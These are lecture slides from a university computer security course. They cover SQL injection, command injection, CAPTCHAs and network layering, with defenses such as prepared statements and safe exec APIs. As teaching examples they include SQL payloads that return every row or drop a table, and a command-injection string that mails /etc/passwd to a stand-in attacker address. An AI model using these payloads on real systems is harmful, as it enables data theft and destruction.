1 of 107

SQL Injection, CAPTCHAs, and Intro to the Internet

CS 161 Spring 2022 - Lecture 16

Computer Science 161

Nicholas Weaver

2 of 107

Last Time: XSS

  • Websites use untrusted content as control data
    • <html><body>Hello EvanBot!</body></html>
    • <html><body>Hello <script>alert(1)</script>!</body></html>
  • Stored XSS
    • The attacker’s JavaScript is stored on the legitimate server and sent to browsers
    • Classic example: Make a post on a social media site (e.g. Facebook) with JavaScript
  • Reflected XSS
    • The attacker causes the victim to input JavaScript into a request, and the content it’s reflected (copied) in the response from the server
    • Classic example: Create a link for a search engine (e.g. Google) query with JavaScript
    • Requires the victim to click on the link with JavaScript

2

Computer Science 161

Nicholas Weaver

3 of 107

Last Time: XSS Defenses

  • Defense: HTML sanitization
    • Replace control characters with data sequences
      • < becomes &lt;
      • " becomes &quot;
    • Use a trusted library to sanitize inputs for you
  • Defense: Templates
    • Library creates the HTML based on a template and automatically handles all sanitization
  • Defense: Content Security Policy (CSP)
    • Instruct the browser to only use resources loaded from specific places
    • Limits JavaScript: only scripts from trusted sources are run in the browser
    • Enforced by the browser

3

Computer Science 161

Nicholas Weaver

4 of 107

Last Time: Clickjacking

  • Clickjacking: Trick the victim into clicking on something from the attacker
  • Main vulnerability: the browser trusts the user’s clicks
    • When the user clicks on something, the browser assumes the user intended to click there
  • Examples
    • Fake download buttons
    • Show the user one frame, when they’re actually clicking on another invisible frame
    • Temporal attack: Change the cursor just before the user clicks
    • Cursorjacking: Create a fake mouse cursor with JavaScript
  • Defenses
    • Enforce visual integrity: Focus the user’s vision on the relevant part of the screen
    • Enforce temporal integrity: Give the user time to understand what they’re clicking on
    • Ask the user for confirmation
    • Frame-busting: The legitimate website forbids other websites from embedding it in an iframe

4

Computer Science 161

Nicholas Weaver

5 of 107

Last Time: Phishing

  • Phishing: Trick the victim into sending the attacker personal information
    • A malicious website impersonates a legitimate website to trick the user
  • Don’t blame the users
    • Detecting phishing is hard, especially if you aren’t a security expert
    • Check the URL? Still vulnerable to homograph attacks (malicious URLs that look legitimate)
    • Check the entire browser? Still vulnerable to browser-in-browser attacks
  • Defense: Two-Factor Authentication (2FA)
    • User must prove their identity two different ways (something you know, something you own, something you are)
    • Defends against attacks where an attacker has only stolen one factor (e.g. the password)
    • Vulnerable to relay attacks: The attacker phishes the victim into giving up both factors
    • Vulnerable to social engineering attacks: Trick humans to subvert 2FA
    • Example: Authentication tokens for generating secure two-factor codes
    • Example: Security keys to prevent phishing

5

Computer Science 161

Nicholas Weaver

6 of 107

Today: SQL Injection and CAPTCHAS

  • Structure of modern web services
  • SQL injection
    • Defenses
  • Command injection
    • Defenses
  • CAPTCHAs
    • Subverting CAPTCHAs

6

Computer Science 161

Nicholas Weaver

7 of 107

SQL Injection

7

Computer Science 161

Nicholas Weaver

8 of 107

Top 25 Most Dangerous Software Weaknesses (2020)

8

Rank

ID

Name

Score

[1]

Improper Neutralization of Input During Web Page Generation (’Cross-site Scripting’)

46.82

[2]

Out-of-bounds Write

46.17

[3]

Improper Input Validation

33.47

[4]

Out-of-bounds Read

26.50

[5]

Improper Restriction of Operations within the Bounds of a Memory Buffer

23.73

[6]

Improper Neutralization of Special Elements used in an SQL Command (’SQL Injection’)

20.69

[7]

Exposure of Sensitive Information to an Unauthorized Actor

19.16

[8]

Use After Free

18.87

[9]

Cross-Site Request Forgery (CSRF)

17.29

[10]

Improper Neutralization of Special Elements used in an OS Command (’OS Command Injection’)

16.44

[11]

Integer Overflow or Wraparound

15.81

[12]

Improper Limitation of a Pathname to a Restricted Directory (’Path Traversal’)

13.67

[13]

NULL Pointer Dereference

8.35

[14]

Improper Authentication

8.17

[15]

Unrestricted Upload of File with Dangerous Type

7.38

[16]

Incorrect Permission Assignment for Critical Resource

6.95

[17]

Improper Control of Generation of Code (’Code Injection’)

6.53

Computer Science 161

Nicholas Weaver

9 of 107

Structure of Web Services

  • Most websites need to store and retrieve data
    • Examples: User accounts, comments, prices, etc.
  • The HTTP server only handles the HTTP requests, and it needs to have some way of storing and retrieving persisted data

9

Computer Science 161

Nicholas Weaver

10 of 107

Structure of Web Services

10

Client

Handle HTML, CSS, JavaScript, etc.

Web Server

Process requests and handle server-side logic

Database Server

Store and provide access to persistent data

2. HTTP GET request

3. Interpret request

4. Query database

5. Return data

6. Construct response

7. HTTP response

1. User requests page

8. Browser renders page

HTTP

SQL (usually)

Computer Science 161

Nicholas Weaver

11 of 107

Databases

  • For this class, we will cover SQL databases
    • SQL = Structured Query Language
    • Each database has a number of tables
    • Each table has a predefined structure, so it has columns for each field and rows for each entry
  • Database server manages access and storage of these databases

11

bots

id

name

likes

age

1

evanbot

pancakes

3

2

codabot

hashes

2.5

3

pintobot

beans

1.5

3 rows, 4 columns

Computer Science 161

Nicholas Weaver

12 of 107

SQL

  • Structured Query Language (SQL): The language used to interact with and manage data stored in a database
    • Defined by the International Organization for Standardization (ISO) and implemented by many SQL servers
  • Good SQL servers are ACID (atomicity, consistency, isolation, and durability)
    • Essentially ensures that the database will never store a partial operation, return an invalid state, or be vulnerable to race conditions
  • Declarative programming language, rather than imperative
    • Declarative: Use code to define the result you want
    • Imperative: Use code to define exactly what to do (e.g. C, Python, Go)

12

Computer Science 161

Nicholas Weaver

13 of 107

Nick’s Thoughts on Databases…

  • CS 186 (Databases) is the one class I regret not taking as an undergraduate...
  • SQL is an incredibly powerful tool for handling large quantities of structured data
    • Hundreds of thousands to billions of records
  • Multiple academic papers started out:
    • Throw a billion records in the Postgres database on the big beefy DB server
      • EG, the results of mapping the infrastructure for 1 billion email spams
    • Write a paper in latex with \result{resultname}
    • Write SQL queries in a python script to populate the various results
    • Type "make paper" and the paper is made!

13

Computer Science 161

Nicholas Weaver

14 of 107

SQL: SELECT

  • SELECT is used to select some columns from a table
  • Syntax:�SELECT [columns] FROM [table]

14

bots

id

name

likes

age

1

evanbot

pancakes

3

2

codabot

hashes

2.5

3

pintobot

beans

1.5

3 rows, 4 columns

Computer Science 161

Nicholas Weaver

15 of 107

SQL: SELECT

SELECT name, age FROM bots

15

bots

id

name

likes

age

1

evanbot

pancakes

3

2

codabot

hashes

2.5

3

pintobot

beans

1.5

3 rows, 4 columns

name

age

evanbot

3

codabot

2.5

pintobot

1.5

3 rows, 2 columns

Selected 2 columns from the table, keeping all rows.

Computer Science 161

Nicholas Weaver

16 of 107

SQL: SELECT

SELECT * FROM bots

16

bots

id

name

likes

age

1

evanbot

pancakes

3

2

codabot

hashes

2.5

3

pintobot

beans

1.5

3 rows, 4 columns

id

name

likes

age

1

evanbot

pancakes

3

2

codabot

hashes

2.5

3

pintobot

beans

1.5

3 rows, 4 columns

The asterisk (*) is shorthand for “all columns.” Select all columns from the table, keeping all rows.

Computer Science 161

Nicholas Weaver

17 of 107

SQL: SELECT

SELECT 'CS', '161' FROM bots

17

bots

id

name

likes

age

1

evanbot

pancakes

3

2

codabot

hashes

2.5

3

pintobot

beans

1.5

3 rows, 4 columns

id

name

CS

161

CS

161

CS

161

3 rows, 2 columns

Select constants instead of columns

Computer Science 161

Nicholas Weaver

18 of 107

SQL: WHERE

  • WHERE can be used to filter out certain rows
    • Arithmetic comparison: <, <=, >, >=, =, <>
    • Arithmetic operators: +, - , * , /
    • Boolean operators: AND, OR
      • AND has precedence over OR

18

bots

id

name

likes

age

1

evanbot

pancakes

3

2

codabot

hashes

2.5

3

pintobot

beans

1.5

3 rows, 4 columns

Computer Science 161

Nicholas Weaver

19 of 107

SQL: WHERE

SELECT * FROM bots�WHERE likes = 'pancakes'

19

bots

id

name

likes

age

1

evanbot

pancakes

3

2

codabot

hashes

2.5

3

pintobot

beans

1.5

3 rows, 4 columns

Choose only the rows where the likes column has value pancakes

id

name

likes

age

1

evanbot

pancakes

3

1 row, 4 columns

Computer Science 161

Nicholas Weaver

20 of 107

SQL: WHERE

SELECT name FROM bots�WHERE age < 2 OR id = 1

20

bots

id

name

likes

age

1

evanbot

pancakes

3

2

codabot

hashes

2.5

3

pintobot

beans

1.5

3 rows, 4 columns

Get all names of bots whose age is less than 2 or whose id is 1

name

evanbot

pintobot

2 rows, 1 column

(selected because id is 1)

(selected because age is 1.5)

Computer Science 161

Nicholas Weaver

21 of 107

SQL: INSERT INTO

  • INSERT INTO is used to add rows into a table
  • VALUES is used for defining constant rows and columns, usually to be inserted

21

bots

id

name

likes

age

1

evanbot

pancakes

3

2

codabot

hashes

2.5

3

pintobot

beans

1.5

3 rows, 4 columns

Computer Science 161

Nicholas Weaver

22 of 107

SQL: INSERT INTO

INSERT INTO items VALUES�(4, 'willow', 'catnip', 5),�(5, 'luna', 'naps', 7)

22

bots

id

name

likes

age

1

evanbot

pancakes

3

2

codabot

hashes

2.5

3

pintobot

beans

1.5

4

willow

catnip

5

5

luna

naps

7

5 rows, 4 columns

This statement results in two extra rows being added to the table

Computer Science 161

Nicholas Weaver

23 of 107

SQL: UPDATE

  • UPDATE is used to change the values of existing rows in a table
    • Followed by SET after the table name
  • Usually combined with WHERE
  • Syntax:�UPDATE [table]�SET [column] = [value]�WHERE [condition]

23

bots

id

name

likes

age

1

evanbot

pancakes

3

2

codabot

hashes

2.5

3

pintobot

beans

1.5

4

willow

catnip

5

5

luna

naps

7

5 rows, 4 columns

Computer Science 161

Nicholas Weaver

24 of 107

SQL: UPDATE

UPDATE bots�SET age = 6�WHERE name = 'willow'

24

bots

id

name

likes

age

1

evanbot

pancakes

3

2

codabot

hashes

2.5

3

pintobot

beans

1.5

4

willow

catnip

6

5

luna

naps

7

5 rows, 4 columns

This statement results in this cell in the table being changed. If the WHERE clause was missing, every value in the age column would be set to 6.

Computer Science 161

Nicholas Weaver

25 of 107

SQL: DELETE

  • DELETE FROM is used to delete rows from a table
  • Usually combined with WHERE
  • Syntax:�DELETE FROM [table]�WHERE [condition]

25

bots

id

name

likes

age

1

evanbot

pancakes

3

2

codabot

hashes

2.5

3

pintobot

beans

1.5

4

willow

catnip

6

5

luna

naps

7

5 rows, 4 columns

Computer Science 161

Nicholas Weaver

26 of 107

SQL: DELETE

DELETE FROM bots�WHERE age >= 6

26

bots

id

name

likes

age

1

evanbot

pancakes

3

2

codabot

hashes

2.5

3

pintobot

beans

1.5

4

willow

catnip

6

5

luna

naps

7

3 rows, 4 columns

This statement results in two rows being deleted from the table

Computer Science 161

Nicholas Weaver

27 of 107

SQL: CREATE

  • CREATE is used to create tables (and sometimes databases)

27

bots

id

name

likes

age

1

evanbot

pancakes

3

2

codabot

hashes

2.5

3

pintobot

beans

1.5

3 rows, 4 columns

Computer Science 161

Nicholas Weaver

28 of 107

SQL: CREATE

CREATE TABLE cats (� id INT,� name VARCHAR(255),� likes VARCHAR(255),� age INT�)

28

bots

id

name

likes

age

1

evanbot

pancakes

3

2

codabot

hashes

2.5

3

pintobot

beans

1.5

3 rows, 4 columns

cats

id

name

likes

age

0 rows, 4 columns

This statement results in a new table being created with the given columns

Note: VARCHAR(255) is a string type

Computer Science 161

Nicholas Weaver

29 of 107

SQL: DROP

  • DROP is used to delete tables (and sometimes databases)
  • Syntax:�DROP TABLE [table]

29

bots

id

name

likes

age

1

evanbot

pancakes

3

2

codabot

hashes

2.5

3

pintobot

beans

1.5

3 rows, 4 columns

cats

id

name

likes

age

0 rows, 4 columns

Computer Science 161

Nicholas Weaver

30 of 107

SQL: DROP

DROP TABLE bots

30

bots

id

name

likes

age

1

evanbot

pancakes

3

2

codabot

hashes

2.5

3

pintobot

beans

1.5

0 rows, 0 columns

cats

id

name

likes

age

0 rows, 4 columns

This statement results in the entire bots table being deleted

Computer Science 161

Nicholas Weaver

31 of 107

SQL: Syntax Characters

  • -- (two dashes) is used for single-line comments (like # in Python or // in C)
  • Semicolons separate different statements:
    • UPDATE items SET price = 2 WHERE id = 4;�SELECT price FROM items WHERE id = 4;
  • SQL is really complicated, but you only need to know the basics for this class

31

Computer Science 161

Nicholas Weaver

32 of 107

A Go HTTP Handler (Again)

32

func handleGetItems(w http.ResponseWriter, r *http.Request) {

itemName := r.URL.Query()["item"][0]

db := getDB()

query := fmt.Sprintf("SELECT name, price FROM items WHERE name = '%s'", itemName)

row, err := db.QueryRow(query)

...

}

SELECT item, price FROM items WHERE name = 'paperclips'

https://vulnerable.com/get-items?item=paperclips

Handler

URL

Query

Remember this string manipulation issue?

Computer Science 161

Nicholas Weaver

33 of 107

A Go HTTP Handler (Again)

33

func handleGetItems(w http.ResponseWriter, r *http.Request) {

itemName := r.URL.Query()["item"][0]

db := getDB()

query := fmt.Sprintf("SELECT name, price FROM items WHERE name = '%s'", itemName)

row, err := db.QueryRow(query)

...

}

SELECT item, price FROM items WHERE name = '''

https://vulnerable.com/get-items?item='

Handler

URL

Query

Invalid SQL executed by the server, 500 Internal Server Error

Computer Science 161

Nicholas Weaver

34 of 107

A Go HTTP Handler (Again)

34

func handleGetItems(w http.ResponseWriter, r *http.Request) {

itemName := r.URL.Query()["item"][0]

db := getDB()

query := fmt.Sprintf("SELECT name, price FROM items WHERE name = '%s'", itemName)

row, err := db.QueryRow(query)

...

}

SELECT item, price FROM items WHERE name = '' OR '1' = '1'

https://vulnerable.com/get-items?item=' OR '1' = '1

Handler

URL

Query

This is essentially OR TRUE, so returns every item!

Computer Science 161

Nicholas Weaver

35 of 107

A Go HTTP Handler (Again)

35

func handleGetItems(w http.ResponseWriter, r *http.Request) {

itemName := r.URL.Query()["item"][0]

db := getDB()

query := fmt.Sprintf("SELECT name, price FROM items WHERE name = '%s'", itemName)

row, err := db.QueryRow(query)

...

}

SELECT item, price FROM items WHERE name = ''; DROP TABLE items --'

https://vulnerable.com/get-items?item='; DROP TABLE items --

Handler

URL

Query

For this payload: End the first quote ('), then start a new statement (DROP TABLE items), then comment out the remaining quote (--)

Computer Science 161

Nicholas Weaver

36 of 107

SQL Injection

  • SQL injection (SQLi): Injecting SQL into queries constructed by the server to cause malicious behavior
    • Typically caused by using vulnerable string manipulation for SQL queries
  • Allows the attacker to execute arbitrary SQL on the SQL server!
    • Leak data
    • Add records
    • Modify records
    • Delete records/tables
    • Basically anything that the SQL server can do

36

Computer Science 161

Nicholas Weaver

37 of 107

Exploits of a Mom

37

Computer Science 161

Nicholas Weaver

38 of 107

Roadside SQLi

38

Computer Science 161

Nicholas Weaver

39 of 107

Blind SQL Injection

  • Not all SQL queries are used in a way that is visible to the user
    • Visible: Shopping carts, comment threads, list of accounts
    • Blind: Password verification, user account creation
    • Some SQL injection vulnerabilities only return a true/false as a way of determining whether your exploit worked!
  • Blind SQL injection: SQL injection attacks where little to no feedback is provided
    • Attacks become more annoying, but vulnerabilities are still exploitable
    • Automated SQL injection detection and exploitation makes this less of an issue
    • Attackers will use automated tools

39

Computer Science 161

Nicholas Weaver

40 of 107

Blind SQL Injection Tools

  • sqlmap: An automated tool to find and exploit SQL injection vulnerabilities on web servers
    • Supports pretty much all database systems
    • Supports blind SQL injection (even through timing side channels)
    • Supports “escaping” from the database server to run commands in the operating system itself
  • Takeaway: “Harder” is harder only until someone makes a tool to automate the attack

40

Computer Science 161

Nicholas Weaver

41 of 107

SQL Injection Defenses

  • Defense: Input sanitization
    • Option #1: Disallow special characters
    • Option #2: Escape special characters
      • Like XSS, SQL injection relies on certain characters that are interpreted specially
      • SQL allows special characters to be escaped with backslash (\) to be treated as data
  • Drawback: Difficult to build a good escaper that handles all edge cases
    • You should never try to build one yourself!
    • Good as a defense-in-depth measure

41

func handleGetItems(w http.ResponseWriter, r *http.Request) {

itemName := r.URL.Query()["item"][0]

itemName = sqlEscape(itemName)

db := getDB()

query := fmt.Sprintf("SELECT name, price FROM items WHERE name = '%s'", itemName)

row, err := db.QueryRow(query)

...

}

Computer Science 161

Nicholas Weaver

42 of 107

SQL Injection Defenses

  • Traditional SQL Processing:
    • Insert user input into SQL query string
    • Parse SQL query string into syntax tree
      • This means that we have to parse user input ⇒ Leads to SQLi vulnerabilities
  • Idea: Don’t insert user input until after parsing is finished
    • We need some way of specifying somewhere where user input will be inserted, but not yet
  • New process:
    • Parse SQL query string into syntax tree
      • If we see a “user input” marker, leave it as a single node in the syntax tree for now
    • Insert user input into SQL syntax tree
      • Now, the parser never even sees the user input!

42

Computer Science 161

Nicholas Weaver

43 of 107

SQL Injection Defenses

  • Defense: Prepared statements
    • Usually represented as a question mark (?) when writing SQL statements
    • Idea: Parse the SQL first, then insert the data
      • When the parser encounters the ?, it fixes it as a single node in the syntax tree
      • After parsing, only then, it inserts data
      • The untrusted input never has a chance to be parsed, only ever treated as data

43

func handleGetItems(w http.ResponseWriter, r *http.Request) {

itemName := r.URL.Query()["item"][0]

db := getDB()

row, err := db.QueryRow("SELECT name, price FROM items WHERE name = ?", itemName)

...

}

Computer Science 161

Nicholas Weaver

44 of 107

SQL Injection Defenses

  • Biggest downside to prepared statements: Not part of the SQL standard!
    • Instead, SQL drivers rely on the actual SQL implementation (e.g. MySQL, PostgreSQL, etc.) to implement prepared statements
  • Must rely on the API to correctly convert the prepared statement into implementation-specific protocol
    • Again: Consider human factors!

44

Computer Science 161

Nicholas Weaver

45 of 107

Cat Break

45

Computer Science 161

Nicholas Weaver

46 of 107

Command Injection

46

Computer Science 161

Nicholas Weaver

47 of 107

Command Injection

  • Untrusted data being treated incorrectly is not a SQL-specific problem
    • Can happen in other languages too
  • Consider: system function in C
    • The function takes a string as input, spawns a shell, and executes the string input as a command in the shell

47

Computer Science 161

Nicholas Weaver

48 of 107

system Command Injection

48

void find_employee(char *regex) {

char cmd[512];

snprintf(cmd, sizeof cmd, "grep '%s' phonebook.txt", regex);

system(cmd);

}

grep 'weaver' phonebook.txt

regex = "weaver"

Handler

Parameter

system Command

String manipulation again!

Computer Science 161

Nicholas Weaver

49 of 107

system Command Injection

49

void find_employee(char *regex) {

char cmd[512];

snprintf(cmd, sizeof cmd, "grep '%s' phonebook.txt", regex);

system(cmd);

}

grep ''; mail mallory@evil.com < /etc/passwd; touch '' phonebook.txt

regex = "'; mail mallory@evil.com < /etc/passwd; touch '"

Handler

Parameter

system Command

Computer Science 161

Nicholas Weaver

50 of 107

Defending Against Command Injection in General

  • Defense: Input sanitization
    • As before, this is hard to implement and difficult to get 100% correct
  • Defense: Use safe APIs
    • In general, remember the KISS principle: Keep It Simple, Stupid
    • For system, executing a shell to execute a command is too powerful!
      • Instead, use execv, which directly executes the program with arguments without parsing
    • Most programming languages have safe APIs that should be use instead of parsing untrusted input
      • system (unsafe) and execv (safe) in C
      • os.system (unsafe) and subprocess.run (safe) in Python
      • exec.Command (safe) in Go
        • Go only has the safe version!
        • Say it with me: Consider human factors!

50

Computer Science 161

Nicholas Weaver

51 of 107

Updates to your "Joined an Existing Project" List:
�Easy things with huge impact

  • Is it in C/C++/Objective C?
    • Turn on all exploit mitigations, ensure the testing infrastructure include valgrind or equivalent
  • Is it Java or Python?
    • grep for unsafe serializations, replace with json if possible
  • Does it involve a web site?
    • Consider requiring a modern browser
    • Enable CSP and SameSite cookies
      • Will require some web-page restructuring to remove any inline JavaScript from HTML pages
  • Does it involve a database?
    • grep for all direct SQL, replace with prepared statements
  • Command injection?
    • grep for "system" etc, replace with safe versions

51

Computer Science 161

Nicholas Weaver

52 of 107

CAPTCHAs

52

Computer Science 161

Nicholas Weaver

53 of 107

Websites are for Humans

  • Most websites are designed for human usage, not robot usage
    • Example: A login page is for users to submit their password, not for an attacker to automate a brute-force attack
  • Robot access of websites can lead to attacks
    • Denial of service: Overwhelming a web server by flooding it with requests
      • We’ll see more denial-of-service later in the networking unit
    • Spam
    • More specific exploitation (e.g. scalping tickets/graphics cards when they go on sale)

53

Computer Science 161

Nicholas Weaver

54 of 107

CAPTCHAs: Definition

  • CAPTCHA: A challenge that is easy for a human to solve, but hard for a computer to solve
    • “Completely Automated Public Turing test to tell Computers and Humans Apart”
    • Sometimes called a “reverse Turing test”
    • Used to distinguish web requests made by humans and web requests made by robots
  • Usage: Administer a CAPTCHA, and if it passes, assume that the user is human and allow access

54

Computer Science 161

Nicholas Weaver

55 of 107

CAPTCHAs: Examples

  • Reading distorted text
  • Identifying images
  • Listening to an audio clip and typing out the words spoken

55

Computer Science 161

Nicholas Weaver

56 of 107

CAPTCHAs and Machine Learning

  • Modern CAPTCHAs have another purpose: Training machine learning algorithms
    • Machine learning often requires manually-labeled datasets
    • CAPTCHAs crowdsource human power to help manually label these big datasets
    • Example: Machine vision problems require manually-labeled examples: “This is a stop sign”

56

Computer Science 161

Nicholas Weaver

57 of 107

CAPTCHAs and Machine Learning

57

Takeaway: Modern CAPTCHAs are used to train machine learning algorithms

Computer Science 161

Nicholas Weaver

58 of 107

CAPTCHAs: Issues

  • Arms race: As computer algorithms get smarter, CAPTCHAs need to get harder
  • Accessibility: As CAPTCHAs get harder, not all humans are able to solve them easily
  • Ambiguity: CAPTCHAs might be so hard that the validator doesn’t know the solution either!
  • Not all bots are bad: CAPTCHAs can distinguish bots from humans, but not good bots from bad bots
    • Example: Crawler bots help archive webpages

58

Computer Science 161

Nicholas Weaver

59 of 107

CAPTCHAs: Attacks

  • Outsourcing attack: Pay humans to solve CAPTCHAs for you
    • CAPTCHAs only verify that there is a human in the loop; everything else can be automated
    • Usually costs a few cents per CAPTCHA
    • CAPTCHAs end up just distinguishing which attackers are willing to spend money
      • Remember: Security is economics!

59

Computer Science 161

Nicholas Weaver

60 of 107

SQL Injection: Summary

  • Web servers interact with databases to store data
    • Web servers use SQL to interact with databases
  • SQL injection: Untrusted input is used as parsed SQL
    • The attacker can construct their own queries to run on the SQL server!
    • Blind SQL injection: SQLi with little to no feedback from the SQL query
    • Defense: Input sanitization
      • Difficult to implement correctly
    • Defense: Prepared statements
      • Data only ever treated as data; bulletproof!
  • Command injection: Untrusted input is used as any parsed language
    • Defense: Keep it simple and use safe API calls

60

Computer Science 161

Nicholas Weaver

61 of 107

CAPTCHAs: Summary

  • CAPTCHA: A challenge that is easy for a human to solve, but hard for a computer to solve
    • Examples: Reading distorted text, identifying images
    • Original purpose: Distinguishing between humans and bots
    • Modern purpose: Forces the attacker to spend some money to solve the CAPTCHAs
    • Modern purpose: Providing training data for machine learning algorithms
  • Issues with CAPTCHAs
    • As computer algorithms get smarter, CAPTCHAs get harder, and not all humans are able to solve them easily
    • Ambiguity: CAPTCHAs might be so hard that the validator doesn't know the solution either!
    • Economics: Breaking CAPTCHAs just costs money
    • Not all bots are bad

61

Computer Science 161

Nicholas Weaver

62 of 107

What’s the Internet?

62

Computer Science 161

Nicholas Weaver

63 of 107

What’s the Internet?

  • Network: A set of connected machines that can communicate with each other
    • Machines on the network agree on a protocol, a set of rules for communication
  • Internet: A global network of computers
    • The web sends data between browsers and servers using the Internet
    • The Internet can be used for more than the web (e.g. SSH)

63

Computer Science 161

Nicholas Weaver

64 of 107

Protocols

  • A protocol is an agreement on how to communicate that specifies syntax and semantics
    • Syntax: How a communication is specified and structured (format, order of messages)
    • Semantics: What a communication means (actions taken when sending/receiving messages)
  • Example: Protocol for asking a question in lecture?
  • The student should raise their hand
  • The student should wait to be called on by the speaker or wait for the speaker to pause
  • The student should speak the question after being called on or after waiting
  • If the student has been unrecognized after some time: Vocalize with “Excuse me!”

64

Computer Science 161

Nicholas Weaver

65 of 107

Layering: The OSI Model

65

Computer Science 161

Nicholas Weaver

66 of 107

Layering

  • Internet design is partitioned into various layers. Each layer…
    • Has a protocol
    • Relies on services provided by the layer below it
    • Provides services to the layer above it
  • Analogous to the structure of an application and the “services” that each layer relies on and provides

66

Code You Write

Run-Time Library

System Calls

Device Drivers

Voltage Levels/Magnetic Domains

Fully isolated from user programs

Computer Science 161

Nicholas Weaver

67 of 107

Example: Sending Mail

67

Alice

Bob

I am hungry.

Computer Science 161

Nicholas Weaver

68 of 107

Example: Sending Mail

68

Alice

Bob

Send to: Bob

I am hungry.

Computer Science 161

Nicholas Weaver

69 of 107

Example: Sending Mail

69

Alice

Bob

Mail to: 123 Bob St

Send to: Bob

I am hungry.

Computer Science 161

Nicholas Weaver

70 of 107

Example: Sending Mail

70

Alice

Bob

Mail to: 123 Bob St

Send to: Bob

I am hungry.

Computer Science 161

Nicholas Weaver

71 of 107

Example: Sending Mail

71

Alice

Bob

Send to: Bob

I am hungry.

Computer Science 161

Nicholas Weaver

72 of 107

Example: Sending Mail

72

Alice

Bob

I am hungry.

Computer Science 161

Nicholas Weaver

73 of 107

Example: Sending Mail

73

Alice

Bob

Each layer communicates with each other, relying on abstractions below them!

Relies upon: Sending messages to people

Provides: Sending messages to people

Relies upon: Sending messages to addresses

Provides: Sending messages to addresses

Computer Science 161

Nicholas Weaver

74 of 107

OSI Model

  • OSI model: Open Systems Interconnection model, a layered model of Internet communication
    • Originally divided into 7 layers
      • But layers 5 and 6 aren’t used in the real world, so we ignore them
      • And we’ll talk about layer 4.5 for encryption later
  • Same reliance upon abstraction
    • A layer can be implemented in different ways without affecting other layers
    • A layer’s protocol can be substituted with another protocol without affecting other layers

74

Application

Transport

(Inter) Network

Link

Physical

1

2

3

4

7

Computer Science 161

Nicholas Weaver

75 of 107

Layer 1: Physical Layer

  • Provides: Sending bits from one device to another
    • Encodes bits to send them over a physical link
      • Patterns of voltage levels
      • Photon intensities
      • RF modulation
  • Examples
    • Wi-Fi radios (IEEE 802.11)
    • Ethernet voltages (IEEE 802.3)

75

Physical

1

Application

Transport

(Inter) Network

Link

2

3

4

7

Computer Science 161

Nicholas Weaver

76 of 107

Layer 1: Physical Layer

76

Physical

1

Application

Transport

(Inter) Network

Link

2

3

4

7

A

B

01110111…01

Physical layer: “How do I transmit this sequence of 0’s and 1’s from A to B?”

Next: How do we talk to more than one device?

Computer Science 161

Nicholas Weaver

77 of 107

Layer 2: Link Layer

  • Provides: Sending frames directly from one device to another
    • Relies upon: Sending bits from one device to another
    • Encodes messages into groups of bits called “frames”
  • Examples
    • Ethernet frames (IEEE 802.3)

77

Physical

1

Application

Transport

(Inter) Network

3

4

7

Link

2

Computer Science 161

Nicholas Weaver

78 of 107

Layer 2: Link Layer

  • Local area network (LAN): A set of computers on a shared network that can directly address one another
    • Consists of multiple physical links
  • Frames must consist of at least 3 things:
    • Source (“Who is this message coming from?”)
    • Destination (“Who is this message going to?”)
    • Data (“What does this message say?”)

78

Source: A

Destination: C

“Hello, this is A…”

A

B

D

C

Computer Science 161

Nicholas Weaver

79 of 107

Layer 2: Link Layer

  • In reality, computers aren’t all connected to the same wire
    • Instead, local networks are a set of point-to-point links
  • However, Layer 2 still allows direct addressing between any two devices
    • Enabled by transmitting a frame across multiple physical links until it reaches its destination
    • Provides an abstraction of a “everything is connected to one wire”

79

Source: A

Dest: C

“Hello, this is A…”

A

B

C

D

E

Computer Science 161

Nicholas Weaver

80 of 107

Ethernet and MAC Addresses

Ethernet header

80

Source MAC Address (6 bytes)

Destination MAC Address (6 bytes)

VLAN Tag (4 bytes)

Type (2 bytes)

Data (variable-length)

Computer Science 161

Nicholas Weaver

81 of 107

Ethernet and MAC Addresses

  • Ethernet: A common layer 2 protocol that most endpoint devices use
  • MAC address: A 6-byte address that identifies a piece of network equipment (e.g. your phone’s Wi-Fi controller)
    • Stands for Media Access Control, not message authentication code
    • Typically represented as 6 hex bytes: 13:37:ca:fe:f0:0d
    • The first 3 bytes are assigned to manufacturers (i.e. who made the equipment)
      • This is useful in identifying a device
    • The last 3 bytes are device-specific

81

Computer Science 161

Nicholas Weaver

82 of 107

Layer 2: Link Layer

82

Physical

1

Application

Transport

(Inter) Network

3

4

7

Link

2

Source: A

Dest: C

“Hello, this is A…”

Link layer: “How do I transmit this frame from A to C, making sure that no one else thinks the message is for them?”

Next: How do we address every device in existence?

A

B

D

C

Computer Science 161

Nicholas Weaver

83 of 107

Layer 3: Network Layer

  • Provides: Sending packets from any device to any other device
    • Relies upon: Sending frames directly from one device to another
    • Encodes messages into groups of bits called “packets”
    • Bridges multiple LANs to provide global addressing
  • Examples
    • Internet Protocol (IP)

83

Physical

1

Application

Transport

4

7

(Inter) Network

3

Link

2

Computer Science 161

Nicholas Weaver

84 of 107

Layer 3: Network Layer

  • Recall the ideal layer 2 model: All devices can directly address all other devices
    • This would not scale to the size of the Internet!
  • Instead, allow packets to be routed across different devices to reach the destination
    • Each hop is allowed to use its own physical and link layers!
  • Basic model:
    • Is the destination of the packet directly connected to my LAN?
      • Pass it off to Layer 2
    • Otherwise, route the packet closer to the destination

84

A

B

D

C

E

F

G

H

Router

Computer Science 161

Nicholas Weaver

85 of 107

Layer 3: Network Layer

85

A

Router

C

D

E

B

Router

Router

Router

Router

Router

Router

Source: A

Destination: D

“Hello, this is A…”

Computer Science 161

Nicholas Weaver

86 of 107

Layer 3: Network Layer

86

A

Router

C

D

E

B

Router

Router

Router

Router

Router

Router

Source: A

Destination: D

“Hello, this is A…”

This link could be Wi-Fi

And this link could be Ethernet

But the Internet protocol stays the same, end to end

Computer Science 161

Nicholas Weaver

87 of 107

Layer 3: Network Layer

  • Packets must consist of at least 3 things:
    • Source (“Who is this message coming from?”)
    • Destination (“Who is this message going to?”)
    • Data (“What does this message say?”)
    • Similar to frames (layer 2)
  • Packets may be fragmented into smaller packets
    • Different links might support different maximum packet sizes
    • Up to the recipient to reassemble fragments into the original packet
    • In IPv4, any node may fragment a packet if it is too large to route
    • In IPv6, the sender must fragment the packet themselves
  • Each router forwards a given packet to the next hop
    • We will cover how a router knows how to forward—and attacks on it—in the future
  • Packets are not guaranteed to take a given route
    • Two packets with the same source and destination may take different routes

87

Computer Science 161

Nicholas Weaver

88 of 107

Internet Protocol (IP)

IPv4 header

88

Version (4 bits)

Header Length (4 bits)

Type of Service (6 bits)

ECN (2 bits)

Total Length (16 bits)

Identification (16 bits)

Flags (3 bits)

Fragment Offset (13 bits)

Time to Live (8 bits)

Protocol (8 bits)

Header Checksum (16 bits)

Source Address (32 bits)

Destination Address (32 bits)

